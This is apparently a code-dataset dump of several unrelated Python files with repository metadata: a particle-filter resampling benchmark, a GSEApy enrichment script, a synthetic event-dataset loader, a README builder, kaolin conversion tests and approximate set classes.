| 26.922078 | 69 | 0.418234 | 176 | 2,073 | 4.789773 | 0.4375 | 0.085409 | 0.064057 | 0.081851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00524 | 0.44766 | 2,073 | 76 | 70 | 27.276316 | 0.731004 | 0.023637 | 0 | 0.111111 | 0 | 0 | 0.203272 | 0.033713 | 0 | 0 | 0 | 0 | 0.031746 | 1 | 0 | false | 0 | 0.095238 | 0 | 0.095238 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e872ae3834e819f8cbdad94db0c72a6ba0a16ae2 | 3,632 | py | Python | PFlib/wplyw_metody_probkowania.py | Rogue05/Praca-Magisterska | 863a0522348eddd093b4de05d12c788ef5f2f520 | [
"MIT"
] | null | null | null | PFlib/wplyw_metody_probkowania.py | Rogue05/Praca-Magisterska | 863a0522348eddd093b4de05d12c788ef5f2f520 | [
"MIT"
] | null | null | null | PFlib/wplyw_metody_probkowania.py | Rogue05/Praca-Magisterska | 863a0522348eddd093b4de05d12c788ef5f2f520 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt

import PFlib as pf

map_size = 1000
# pop_size = 10000
d_vel = 0.1
d_ori = 0.3
vel = 11

#================================
mapa = pf.PrimitiveMap(map_size)
mapa.add_line(-1, 1, 800)
mapa.add_circle(1000, 1000, 300)
mapa.add_circle(200, 0, 300)
mapa.add_circle(200, 700, 100)
mapa.add_circle(800, 400, 60)


def get_err(sus=True, pop_size=1000, limit=300, random_walker=False):
    pop = pf.get_random_pop(mapa, pop_size)
    weights = pf.get_uniform_weights(pop_size)

    real_state = pf.robot_2d(500, 500, 0, vel)

    #================================
    diffx = []
    diffy = []
    popss = [pop_size, ]
    oriss = [real_state.ori, ]
    for i in range(limit):
        # if not plt.fignum_exists(fig.number):
        #     break
        nori = 0.1
        if random_walker:
            nori = np.random.uniform(-.1, .1)
        pf.drift_state(mapa, real_state, nori, 0.0)
        pf.drift_pop(mapa, pop, nori, 0.0, d_ori, d_vel)

        meas = mapa.get_meas(real_state.x, real_state.y, real_state.ori)
        weights = pf.update_weights(mapa, meas, pop, weights)

        est_state = pf.get_est(pop, weights)
        # print(' e', i, est_state.x, est_state.y, est_state.ori, est_state.vel)

        # if i > 100:
        diffx.append(real_state.x - est_state.x)
        diffy.append(real_state.y - est_state.y)

        effN = 1 / (weights**2).sum()
        if effN < 0.8 * pop_size:
            # print(i, 'resample', pop_size, effN, flush=True)
            alpha = 100
            # pop_size = pf.get_new_N(mapa, pop, weights, meas, alpha)
            popss.append(pop_size)
            oriss.append(real_state.ori)
            if sus:
                pop = pf.sus_resample(pop, weights, pop_size)
            else:
                pop = pf.roulette_wheel_resample(pop, weights, pop_size)
            weights = pf.get_uniform_weights(pop_size)

    # plt.plot(pop)
    return np.sqrt(np.array(diffx)**2 + np.array(diffy)**2) / vel
    # plt.plot(diffx, label='$x_{{err}}$')
    # plt.plot(diffy, label='$y_{{err}}$')


for N in [100, 300, 1000]:
    avgs = 100
    sus = np.zeros(300)
    for a in range(avgs):
        print('sus', a, N)
        sus += get_err(True, pop_size=N)
    sus /= avgs
    plt.plot(sus, label='SUS N=' + str(N))

    rou = np.zeros(300)
    for a in range(avgs):
        print('rou', a, N)
        rou += get_err(False, pop_size=N)
    rou /= avgs
    plt.plot(rou, label='Roulette N=' + str(N))

plt.legend()
plt.xlabel('t')
plt.ylabel('$\\frac{{\\sqrt{{x^2_{{err}}+y^2_{{err}}}}}}{{v}}$')
# plt.title('Influence of the sampling method on estimation quality.')
plt.show()

# plt.figure()
# plt.plot(get_err(pop_size=10), label='N=10')

# # ----------------------
# L = 1000
# # L = 10
# a100 = np.zeros(L)
# T = 100
# # T = 10
# for t in range(T):
#     print(t)
#     tmp = get_err(pop_size=100, limit=L, random_walker=False)
#     a100 += tmp
# a100 /= T
# plt.plot(a100, label='N=100')

# a300 = np.zeros(L)
# # T = 10
# for t in range(T):
#     print(t)
#     tmp = get_err(pop_size=300, limit=L, random_walker=False)
#     a300 += tmp
# a300 /= T
# plt.plot(a300, label='N=300')

# a500 = np.zeros(L)
# # T = 10
# for t in range(T):
#     print(t)
#     tmp = get_err(pop_size=500, limit=L, random_walker=False)
#     a500 += tmp
# a500 /= T
# plt.plot(a500, label='N=500')

# a1000 = np.zeros(L)
# # T = 10
# for t in range(T):
#     print(t)
#     tmp = get_err(pop_size=1000, limit=L)
#     # plt.plot(tmp, label=str(t))
#     a1000 += tmp
# a1000 /= T
# plt.plot(a1000, label='N=1000')

# a10000 = np.zeros(L)
# # T = 10
# for t in range(T):
#     print(t)
#     tmp = get_err(pop_size=10000, limit=L)
#     # plt.plot(tmp, label=str(t))
#     a10000 += tmp
# a10000 /= T
# plt.plot(a10000, label='N=10000')

# plt.legend()
# plt.xlabel('t')
# # plt.ylabel('$\\sqrt{{x^2_{{err}}+y^2_{{err}}}}/v$')
# plt.ylabel('$\\frac{{\\sqrt{{x^2_{{err}}+y^2_{{err}}}}}}{{v}}$')
# # plt.title('Influence of the number of particles on estimation quality.')
# plt.show()
| 21.116279 | 76 | 0.625 | 636 | 3,632 | 3.43239 | 0.190252 | 0.064132 | 0.024737 | 0.035731 | 0.321118 | 0.252405 | 0.252405 | 0.230875 | 0.207971 | 0.136967 | 0 | 0.080104 | 0.15446 | 3,632 | 171 | 77 | 21.239766 | 0.630739 | 0.447412 | 0 | 0.065574 | 0 | 0 | 0.038402 | 0.025947 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016393 | false | 0 | 0.04918 | 0 | 0.081967 | 0.032787 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
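The script benchmarks PFlib's compiled resamplers; for reference, a NumPy-only sketch of the two schemes being compared (standalone, not PFlib's API):

import numpy as np

def roulette_wheel(weights, n, rng=np.random.default_rng()):
    # n independent draws, each proportional to weight -> higher variance
    return rng.choice(len(weights), size=n, p=weights / weights.sum())

def sus(weights, n, rng=np.random.default_rng()):
    # one random offset, n evenly spaced pointers -> lower-variance resampling
    pointers = (rng.random() + np.arange(n)) / n
    return np.searchsorted(np.cumsum(weights / weights.sum()), pointers)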
e879aa27a436b9bd2399eb97ac2c13e11d6cb76e | 3,083 | py | Python | workflow/scripts/Enrichr_enrichment_GSEApy.py | sreichl/genomic_region_enrichment | 7e8425c6962290a3201f8a250dd3888b23a93d7c | [
"MIT"
] | null | null | null | workflow/scripts/Enrichr_enrichment_GSEApy.py | sreichl/genomic_region_enrichment | 7e8425c6962290a3201f8a250dd3888b23a93d7c | [
"MIT"
] | null | null | null | workflow/scripts/Enrichr_enrichment_GSEApy.py | sreichl/genomic_region_enrichment | 7e8425c6962290a3201f8a250dd3888b23a93d7c | [
"MIT"
] | null | null | null | #!/bin/env python

import pandas as pd
import pickle
import os
import numpy as np
import gseapy as gp


# utils for manual odds ratio calculation
def overlap_converter(overlap_str, bg_n, gene_list_n):
    overlap_n, gene_set_n = str(overlap_str).split('/')
    return odds_ratio_calc(bg_n, gene_list_n, int(gene_set_n), int(overlap_n))


def odds_ratio_calc(bg_n, gene_list_n, gene_set_n, overlap_n):
    import scipy.stats as stats
    table = np.array([[gene_set_n, bg_n - gene_set_n], [overlap_n, gene_list_n - overlap_n]])
    oddsratio, pvalue = stats.fisher_exact(table)
    return (1 / oddsratio)


# get snakemake parameters
query_genes_path = snakemake.input['query_genes']
background_genes_path = snakemake.input['background_genes']
enrichr_databases = snakemake.input['enrichr_databases']
dir_results = snakemake.output['result_GSEApy']

# testing
# query_genes_path = '/nobackup/lab_bock/projects/bmdm-stim/results/ATAC/all/enrichment_analysis/DEA/LPS_2h_up/GREAT/GREAT_genes.txt'
# background_genes_path = '/nobackup/lab_bock/projects/bmdm-stim/results/ATAC/all/enrichment_analysis/DEA/background_genes/BMDM/GREAT_background_genes.txt'
# enrichr_databases = 'resources/enrichr_databases.pkl'
# dir_results = '/nobackup/lab_bock/projects/bmdm-stim/results/ATAC/all/enrichment_analysis/DEA/LPS_2h_up/GSEApy'

if not os.path.exists(dir_results):
    os.mkdir(dir_results)

# check if GREAT/Genes.tsv exists & load or handle exception
if os.path.exists(query_genes_path):
    genes = open(query_genes_path, "r")
    gene_list = genes.read()
    gene_list = gene_list.split('\n')
    genes.close()
else:
    with open(os.path.join(dir_results, "no_genes_found.txt"), 'w') as f:
        f.write('no genes found')
    quit()

# load background genes
bg_file = open(background_genes_path, "r")
background = bg_file.read()
background = background.split('\n')
bg_file.close()

# load database .pkl file
with open(enrichr_databases, 'rb') as f:
    db_dict = pickle.load(f)

# convert gene lists to upper case
gene_list = [str(x).upper() for x in list(gene_list)]
background = [str(x).upper() for x in list(background)]

# perform enrichment of every database with GSEApy (plots are generated automatically)
bg_n = len(background)
res = dict()
for db in db_dict.keys():
    res = gp.enrichr(gene_list=gene_list,
                     gene_sets=db_dict[db],
                     background=background,
                     # organism='mouse',
                     outdir=os.path.join(dir_results, db),
                     top_term=25,
                     cutoff=0.05,
                     format='svg',
                     verbose=False,
                     )

    # move on if result is empty
    if res.results.shape[0] == 0:
        continue

    # annotate used gene set
    res.results['Gene_set'] = db

    # odds ratio calculation
    gene_list_n = len(gene_list)
    res.results['Odds Ratio'] = res.results['Overlap'].apply(overlap_converter, args=(bg_n, gene_list_n))

    # separate export
    res.results.to_csv(os.path.join(dir_results, db, "Enrichr_{}.csv".format(db)))
| 33.51087 | 155 | 0.696075 | 453 | 3,083 | 4.503311 | 0.322296 | 0.054902 | 0.026471 | 0.02451 | 0.227451 | 0.210784 | 0.155882 | 0.137255 | 0.112745 | 0.112745 | 0 | 0.003989 | 0.186831 | 3,083 | 91 | 156 | 33.879121 | 0.809733 | 0.289653 | 0 | 0 | 0 | 0 | 0.064947 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.111111 | 0 | 0.185185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
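A quick sanity check of the odds-ratio helper defined above (numbers are illustrative):

# 10,000 background genes, 500-gene query, 200-gene set, 40 genes overlapping:
print(odds_ratio_calc(bg_n=10000, gene_list_n=500, gene_set_n=200, overlap_n=40))
# prints roughly 4.26, i.e. the overlap is ~4x enriched over the background rate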
e879c3261bb02d64435347d4c8f1654eaa42a5d9 | 3,031 | py | Python | example_data_loader.py | uoguelph-mlrg/LDG | 203695748fb6d12cef40a801e634fbdab5e23692 | [
"ECL-2.0"
] | 80 | 2019-09-24T01:56:58.000Z | 2022-03-10T07:20:52.000Z | example_data_loader.py | uoguelph-mlrg/LDG | 203695748fb6d12cef40a801e634fbdab5e23692 | [
"ECL-2.0"
] | 9 | 2019-11-14T12:33:21.000Z | 2022-03-14T08:05:54.000Z | example_data_loader.py | uoguelph-mlrg/LDG | 203695748fb6d12cef40a801e634fbdab5e23692 | [
"ECL-2.0"
] | 25 | 2019-09-26T02:14:22.000Z | 2022-03-09T12:22:03.000Z | import numpy as np
import datetime
from datetime import datetime, timezone

from data_loader import EventsDataset


class ExampleDataset(EventsDataset):
    def __init__(self, split, data_dir=None):
        super(ExampleDataset, self).__init__()

        if split == 'train':
            time_start = 0
            time_end = datetime(2013, 8, 31, tzinfo=self.TZ).toordinal()
        elif split == 'test':
            time_start = datetime(2013, 9, 1, tzinfo=self.TZ).toordinal()
            time_end = datetime(2014, 1, 1, tzinfo=self.TZ).toordinal()
        else:
            raise ValueError('invalid split', split)

        self.FIRST_DATE = datetime(2012, 12, 28, tzinfo=self.TZ)
        self.TEST_TIMESLOTS = [datetime(2013, 9, 1, tzinfo=self.TZ),
                               datetime(2013, 9, 25, tzinfo=self.TZ),
                               datetime(2013, 10, 20, tzinfo=self.TZ),
                               datetime(2013, 11, 15, tzinfo=self.TZ),
                               datetime(2013, 12, 10, tzinfo=self.TZ),
                               datetime(2014, 1, 1, tzinfo=self.TZ)]

        self.N_nodes = 100

        self.A_initial = np.random.randint(0, 2, size=(self.N_nodes, self.N_nodes))
        self.A_last = np.random.randint(0, 2, size=(self.N_nodes, self.N_nodes))

        print('\nA_initial', np.sum(self.A_initial))
        print('A_last', np.sum(self.A_last), '\n')

        self.n_events = 10000
        all_events = []
        for i in range(self.n_events):
            user_id1 = np.random.randint(0, self.N_nodes)
            user_id2 = np.random.choice(np.delete(np.arange(self.N_nodes), user_id1))
            ts = max((time_start, self.FIRST_DATE.toordinal()))
            event_time = datetime.fromordinal(ts + np.random.randint(0, time_end - ts))
            assert event_time.timestamp() >= self.FIRST_DATE.timestamp(), (event_time, self.FIRST_DATE)
            all_events.append((user_id1, user_id2, np.random.choice(['communication event',
                                                                     'association event']), event_time))

        self.event_types = ['communication event']

        self.all_events = sorted(all_events, key=lambda t: t[3].timestamp())

        print('\n%s' % split.upper())
        print('%d events between %d users loaded' % (len(self.all_events), self.N_nodes))
        print('%d communication events' % (len([t for t in self.all_events if t[2] == 'communication event'])))
        print('%d association events' % (len([t for t in self.all_events if t[2] == 'association event'])))

        self.event_types_num = {'association event': 0}
        k = 1  # k >= 1 for communication events
        for t in self.event_types:
            self.event_types_num[t] = k
            k += 1

        self.n_events = len(self.all_events)

    def get_Adjacency(self, multirelations=False):
        if multirelations:
            print('warning: this dataset has only one relation type, so multirelations are ignored')
        return self.A_initial, ['association event'], self.A_last
| 42.690141 | 104 | 0.584626 | 399 | 3,031 | 4.280702 | 0.295739 | 0.032201 | 0.070258 | 0.058548 | 0.23185 | 0.147541 | 0.147541 | 0.086651 | 0.086651 | 0.086651 | 0 | 0.045961 | 0.289343 | 3,031 | 70 | 105 | 43.3 | 0.746982 | 0.010228 | 0 | 0 | 0 | 0 | 0.096398 | 0 | 0 | 0 | 0 | 0 | 0.018868 | 1 | 0.037736 | false | 0 | 0.075472 | 0 | 0.150943 | 0.132075 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
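A minimal usage sketch for the synthetic dataset above:

train = ExampleDataset('train')                    # random events up to 2013-08-31
A_initial, relations, A_last = train.get_Adjacency()
print(len(train.all_events), A_initial.shape)      # 10000 (100, 100)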
e87b0aaeaa60765fcae367e6a4d8af12852ba6ec | 2,303 | py | Python | examples/build_readme.py | timdavis3991/do-py | 921d3b3bdeb108f3e6379dcacab6ed6ffaaa0776 | [
"MIT"
] | 7 | 2020-07-07T02:53:44.000Z | 2022-03-28T00:56:36.000Z | examples/build_readme.py | timdavis3991/do-py | 921d3b3bdeb108f3e6379dcacab6ed6ffaaa0776 | [
"MIT"
] | 31 | 2020-03-24T17:55:05.000Z | 2022-03-31T04:27:14.000Z | examples/build_readme.py | timdavis3991/do-py | 921d3b3bdeb108f3e6379dcacab6ed6ffaaa0776 | [
"MIT"
] | null | null | null | """
Build the do-py readme dynamically using the examples specified in the template file.
"""
import os

from do_py import DataObject, R

ROOT = os.path.abspath(__file__).replace('/examples/build_readme.py', '')
DOCSTRING_DELIM = '"""\n'
EXAMPLE_PREFIX = '//example='


class ExampleFile(DataObject):
    _restrictions = {
        'file_name': R.STR,
        'lines': R.LIST
    }

    @classmethod
    def from_file_name(cls, file_name):
        """
        :rtype: ExampleFile
        """
        lines = []
        with open('{root}/examples/{file_name}'.format(root=ROOT, file_name=file_name)) as f:
            lines.extend(f.readlines())
        return cls({
            'file_name': file_name,
            'lines': lines
        })

    @property
    def doc(self):
        """
        :rtype: list of str
        """
        doc_lines = []
        if self.lines[0] == DOCSTRING_DELIM:
            for line in self.lines[1:]:
                if line == DOCSTRING_DELIM:
                    break
                if len(doc_lines) == 0:
                    line = '### %s' % line
                doc_lines.append(line)
        return doc_lines

    @property
    def body(self):
        """
        :rtype: list of str
        """
        doc = 0
        body = []
        for line in self.lines:
            if line == DOCSTRING_DELIM:
                doc += 1
                continue
            if doc == 2:
                body.append(line)
        return body


def main():
    with open('%s/examples/template_readme.md' % ROOT, 'r') as template_file:
        template_readme = template_file.readlines()

    readme = []
    for line in template_readme:
        if line.startswith(EXAMPLE_PREFIX):
            example_file_name = line.replace(EXAMPLE_PREFIX, '').replace('\n', '')
            example_file = ExampleFile.from_file_name(example_file_name)
            readme.extend(example_file.doc)
            readme.append('```python\n')
            readme.extend(example_file.body)
            readme.append('```\n')
            readme.append('\n')
            readme.append('\n')
        else:
            readme.append(line)

    with open('%s/README.md' % ROOT, 'w+') as result_readme_file:
        result_readme_file.writelines(readme)


if __name__ == '__main__':
    main()
| 26.170455 | 93 | 0.532783 | 255 | 2,303 | 4.603922 | 0.270588 | 0.074957 | 0.022998 | 0.027257 | 0.099659 | 0.068995 | 0 | 0 | 0 | 0 | 0 | 0.003955 | 0.341294 | 2,303 | 87 | 94 | 26.471264 | 0.769941 | 0.062961 | 0 | 0.098361 | 0 | 0 | 0.084575 | 0.039404 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065574 | false | 0 | 0.032787 | 0 | 0.180328 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e87b3748da4ce10b5009ce4ede0faab7da426d10 | 1,579 | py | Python | tests/conversions/test_pointcloudconversions.py | Bob-Yeah/kaolin | 7ad34f8158000499a30b8dfa14fb3ed86d2e57a6 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-10-31T01:08:17.000Z | 2021-11-08T09:43:17.000Z | tests/conversions/test_pointcloudconversions.py | Bob-Yeah/kaolin | 7ad34f8158000499a30b8dfa14fb3ed86d2e57a6 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | tests/conversions/test_pointcloudconversions.py | Bob-Yeah/kaolin | 7ad34f8158000499a30b8dfa14fb3ed86d2e57a6 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-08-10T09:19:19.000Z | 2021-11-12T08:18:17.000Z | # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#     http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import pytest
import torch
import sys

import kaolin as kal
from kaolin.rep import TriangleMesh


def test_pointcloud_to_voxelgrid(device='cpu'):
    mesh = TriangleMesh.from_obj('tests/model.obj')
    if device == 'cuda':
        mesh.cuda()

    pts, _ = kal.conversions.trianglemesh_to_pointcloud(mesh, 1000)
    voxels = kal.conversions.pointcloud_to_voxelgrid(pts, 32, 0.1)
    assert (voxels.shape == (32, 32, 32))


def test_pointcloud_to_trianglemesh(device='cpu'):
    mesh = TriangleMesh.from_obj('tests/model.obj')
    if device == 'cuda':
        mesh.cuda()

    pts, _ = kal.conversions.trianglemesh_to_pointcloud(mesh, 1000)
    mesh_ = kal.conversions.pointcloud_to_trianglemesh(pts)


def test_pointcloud_to_sdf(device='cpu'):
    mesh = TriangleMesh.from_obj('tests/model.obj')
    if device == 'cuda':
        mesh.cuda()

    pts, _ = kal.conversions.trianglemesh_to_pointcloud(mesh, 1000)
    sdf_ = kal.conversions.pointcloud_to_trianglemesh(pts)
| 32.895833 | 74 | 0.732109 | 220 | 1,579 | 5.122727 | 0.440909 | 0.053239 | 0.045253 | 0.050577 | 0.37622 | 0.37622 | 0.303461 | 0.303461 | 0.303461 | 0.303461 | 0 | 0.022901 | 0.170361 | 1,579 | 47 | 75 | 33.595745 | 0.837405 | 0.368588 | 0 | 0.5 | 0 | 0 | 0.066937 | 0 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0.125 | false | 0 | 0.208333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e87cc4937f8777828b512523a7e8d07bc28ebe5f | 10,022 | py | Python | sets.py | CyanoKobalamyne/pmsim | 6434a35fe0bc3aa2ce0852a942111e9d39f1959a | [
"MIT"
] | null | null | null | sets.py | CyanoKobalamyne/pmsim | 6434a35fe0bc3aa2ce0852a942111e9d39f1959a | [
"MIT"
] | null | null | null | sets.py | CyanoKobalamyne/pmsim | 6434a35fe0bc3aa2ce0852a942111e9d39f1959a | [
"MIT"
] | null | null | null | """Set implementations for Puppetmaster."""
from __future__ import annotations
from typing import (
AbstractSet,
Callable,
Iterable,
Iterator,
List,
MutableMapping,
Optional,
)
from api import ObjSet, ObjSetMaker, ObjSetMakerFactory
def default_hash(i: int, x: int, n: int):
"""Return a hash value for x.
Arguments:
i: hash function index within family
x: value to be hashed
n: domain
"""
return (x + i) % n
class IdealObjSet(set, ObjSet): # type: ignore
"""Wrapper around the built-in set."""
class IdealObjSetMaker(ObjSetMaker):
"""Wrapper around the built-in set class."""
def __call__(self, objects: Iterable[int] = ()) -> IdealObjSet:
"""Return new built-in set."""
return IdealObjSet(objects)
def free_objects(self, objects: Iterable[int]) -> None:
"""See ObjSetMaker.free_objects."""
pass
class IdealObjSetMakerFactory(ObjSetMakerFactory):
"""Factory for (wrapped) built-in sets."""
def __call__(self):
"""See ObjSetMakerFactory.__call__."""
return IdealObjSetMaker()
def __str__(self) -> str:
"""Return human-readable name for the sets."""
return "Idealized set"
class ApproximateObjSet(ObjSet):
"""Bloom filter-like implementation of an integer set."""
def __init__(self, objects: Iterable[int] = (), /, *, size: int):
"""Initialize set to contain objects."""
self.bits = 0
self.size = size
for obj in objects:
self.bits |= 1 << (obj % size)
def __contains__(self, obj: object) -> bool:
"""Not implemented."""
raise NotImplementedError
def __iter__(self) -> Iterator[int]:
"""Not implemented."""
raise NotImplementedError
def __len__(self) -> int:
"""Not implemented."""
raise NotImplementedError
def __bool__(self) -> bool:
"""Return False if set is empty."""
return self.bits != 0
def __or__(self, other: AbstractSet) -> ApproximateObjSet:
"""Return the union of this set and the other set."""
if isinstance(other, ApproximateObjSet):
out = ApproximateObjSet(size=self.size)
out.bits = self.bits | other.bits
return out
else:
raise TypeError(
f"other set must have type {self.__class__.__name__}, not {type(other)}"
)
def __and__(self, other: AbstractSet) -> ApproximateObjSet:
"""Return the intersection of this set and the other set."""
if isinstance(other, ApproximateObjSet):
out = ApproximateObjSet(size=self.size)
out.bits = self.bits & other.bits
return out
else:
raise TypeError(
f"other set must have type {self.__class__.__name__}, not {type(other)}"
)
def copy(self):
"""See ObjSet.copy."""
copied = ApproximateObjSet(size=self.size)
copied.bits = self.bits
return copied
class ApproximateObjSetMaker(ObjSetMaker):
"""Makes approximate object set instances."""
def __init__(self, factory: ApproximateObjSetMakerFactory):
"""Initialize approximate object set maker."""
self.size = factory.size
def __call__(self, objects: Iterable[int] = ()) -> ApproximateObjSet:
"""Return new approximate set."""
return ApproximateObjSet(objects, size=self.size)
def free_objects(self, objects: Iterable[int]) -> None:
"""See ObjSetMaker.free_objects."""
pass
class ApproximateObjSetMakerFactory(ObjSetMakerFactory):
"""Factory for approximate set maker instances with preset arguments."""
def __init__(self, size: int):
"""Initialize factory for approximate object set makers.
Arguments:
size: width of bit vector used to represent the set
"""
self.size = size
self.generator = ApproximateObjSetMaker(self)
def __call__(self) -> ApproximateObjSetMaker:
"""Return new approximate object set maker."""
return self.generator
def __str__(self) -> str:
"""Return human-readable name for the sets."""
return f"Approximate set ({self.size} bits)"
class FiniteObjSet(ObjSet):
"""Fixed-size set with a global renaming table."""
def __init__(
self,
objects: Iterable[int] = (),
/,
*,
size: int,
renaming_table: MutableMapping[int, int],
):
"""Initialize set to contain objects."""
self.bits = 0
self.objs = [-1] * size
self.size = size
self.table = renaming_table
inserted = set()
for obj in objects:
if obj in inserted:
# Ignore duplicates.
continue
try:
index = renaming_table[obj]
inserted.add(obj)
except KeyError:
for iobj in inserted:
del renaming_table[iobj]
raise ValueError("renaming table can't accept this object")
self.bits |= 1 << index
self.objs[index] = obj
def __contains__(self, obj: object) -> bool:
"""Not implemented."""
raise NotImplementedError
def __iter__(self) -> Iterator[int]:
"""Yield each object in the set."""
for obj in self.objs:
if obj != -1:
yield obj
def __len__(self) -> int:
"""Not implemented."""
raise NotImplementedError
def __bool__(self) -> bool:
"""Return False if set is empty."""
return self.bits != 0
def __or__(self, other: AbstractSet) -> FiniteObjSet:
"""Return the union of this set and the other set."""
if isinstance(other, FiniteObjSet):
out = FiniteObjSet(size=self.size, renaming_table=self.table)
out.bits = self.bits | other.bits
return out
else:
raise TypeError(
f"other set must have type {self.__class__.__name__}, not {type(other)}"
)
def __and__(self, other: AbstractSet) -> FiniteObjSet:
"""Return the intersection of this set and the other set."""
if isinstance(other, FiniteObjSet):
out = FiniteObjSet(size=self.size, renaming_table=self.table)
out.bits = self.bits & other.bits
return out
else:
raise TypeError(
f"other set must have type {self.__class__.__name__}, not {type(other)}"
)
def copy(self):
"""See ObjSet.copy."""
copied = FiniteObjSet(size=self.size, renaming_table=self.table)
copied.bits = self.bits
copied.objs = self.objs
return copied
class FiniteObjSetMaker(ObjSetMaker, MutableMapping[int, int]):
"""Makes fixed-size object sets that use a global renaming table."""
def __init__(self, factory: FiniteObjSetMakerFactory):
"""Initialize finite set maker."""
self.size = factory.size
self.hash_fn = factory.hash_fn
self.n_hash_funcs = factory.n_hash_funcs
self.table = [(-1, 0)] * factory.size
self.history: List[int] = []
def __call__(self, objects: Iterable[int] = ()) -> FiniteObjSet:
"""Return new fixed-size set."""
return FiniteObjSet(objects, size=self.size, renaming_table=self)
def free_objects(self, objects: Iterable[int]) -> None:
"""Free resources associated with objects in the set."""
for obj in objects:
del self[obj]
def __getitem__(self, obj: int) -> int:
"""Return name for object smaller than the table size."""
assert obj != -1
for i in range(self.n_hash_funcs):
h = self.hash_fn(i, obj, self.size)
prev_obj, count = self.table[h]
if prev_obj == -1:
self.table[h] = (obj, 1)
elif prev_obj == obj:
self.table[h] = (obj, count + 1)
else:
continue
self.history.append(i + 1)
return h
raise KeyError("renaming table is full")
def __delitem__(self, obj: int) -> None:
"""Remove an object from the renaming table."""
assert obj != -1
for i in range(self.n_hash_funcs):
h = self.hash_fn(i, obj, self.size)
prev_obj, count = self.table[h]
assert prev_obj != -1 and count > 0 or prev_obj == -1 and count == 0
if prev_obj == obj and count == 1:
self.table[h] = (-1, 0)
elif prev_obj == obj and count > 1:
self.table[h] = (obj, count - 1)
else:
continue
break
else:
raise KeyError("object not found")
def __setitem__(self, obj: int, name: int) -> None:
"""Not implemented."""
raise NotImplementedError
def __iter__(self):
"""Not implemented."""
raise NotImplementedError
def __len__(self):
"""Not implemented."""
raise NotImplementedError
class FiniteObjSetMakerFactory(ObjSetMakerFactory):
"""Factory for fixed-size object set makers with preset arguments."""
def __init__(
self,
size: int,
hash_fn: Optional[Callable[[int, int, int], int]] = None,
n_hash_funcs: Optional[int] = None,
):
"""Initialize factory with set size and hash functions."""
self.size = size
self.hash_fn = default_hash if hash_fn is None else hash_fn
self.n_hash_funcs = size if n_hash_funcs is None else n_hash_funcs
def __call__(self, objects: Iterable[int] = ()) -> FiniteObjSetMaker:
"""Return new fixed-size set maker."""
return FiniteObjSetMaker(self)
def __str__(self) -> str:
"""Return human-readable name for the sets."""
return f"Fixed-size set ({self.size} bits, {self.n_hash_funcs} hash functions)"
| 31.815873 | 88 | 0.587108 | 1,126 | 10,022 | 5.03286 | 0.153641 | 0.028234 | 0.030175 | 0.034939 | 0.530969 | 0.50997 | 0.445915 | 0.402153 | 0.352568 | 0.342333 | 0 | 0.003576 | 0.302435 | 10,022 | 314 | 89 | 31.917197 | 0.807038 | 0.192177 | 0 | 0.476923 | 0 | 0 | 0.060067 | 0.01332 | 0 | 0 | 0 | 0 | 0.015385 | 1 | 0.194872 | false | 0.010256 | 0.015385 | 0 | 0.353846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
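A minimal sketch of how the fixed-size flavour is meant to be wired together (assuming the `api` interfaces behave as their names suggest):

factory = FiniteObjSetMakerFactory(size=16, n_hash_funcs=4)
make_set = factory()            # one maker owns one shared renaming table
a = make_set([3, 19])           # 19 gets renamed into the 16-slot table
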